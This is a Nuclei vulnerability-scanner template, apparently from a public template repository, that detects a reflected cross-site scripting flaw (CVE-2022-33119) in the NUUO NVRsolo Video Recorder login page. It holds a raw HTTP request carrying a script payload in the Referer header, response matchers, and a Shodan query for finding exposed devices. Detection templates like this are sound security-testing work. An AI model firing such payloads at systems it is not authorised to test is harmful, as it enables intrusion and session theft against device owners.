nuclei-templates/http/cves/2022/CVE-2022-33119.yaml

49 lines
1.8 KiB
YAML
Raw Normal View History

2022-07-28 14:47:17 +00:00
id: CVE-2022-33119
info:
name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting
2022-07-28 14:47:17 +00:00
author: arafatansari
severity: medium
2022-07-28 14:47:17 +00:00
description: |
NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:59:08 +00:00
remediation: |
Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software.
2022-07-29 08:47:39 +00:00
reference:
- https://github.com/badboycxcc/nuuo-xss/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-33119
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-33119
cwe-id: CWE-79
epss-score: 0.02148
epss-percentile: 0.8813
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:*
2022-07-28 14:47:17 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: nuuo
product: nvrsolo_firmware
2023-09-06 11:59:08 +00:00
shodan-query: http.html:"NVRsolo"
2023-12-05 09:50:33 +00:00
tags: cve,cve2022,nvrsolo,xss,nuuo
2022-07-28 14:47:17 +00:00
http:
2022-07-28 14:47:17 +00:00
- raw:
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-07-29 08:47:39 +00:00
Referer: "><script>alert(document.domain)</script><"
2022-07-28 14:47:17 +00:00
language=en&user=user&pass=pass&submit=Login
matchers:
2022-07-29 08:47:39 +00:00
- type: dsl
dsl:
- 'contains(header, "text/html")'
2022-07-29 08:47:39 +00:00
- 'status_code == 200'
- contains(body,'<script>alert(document.domain)</script><\"?cmd=')
condition: and
# digest: 4b0a00483046022100812a156d314d21db6ff92860fd49fabd6c94ef6f8c45d43d9d0dc23f310af353022100eda1f9b12a62edfd8c86d09f273e9ef69ebe5c45b6a41eb094c734d078e6ccce:922c64590222798bb761d5b6d8e72950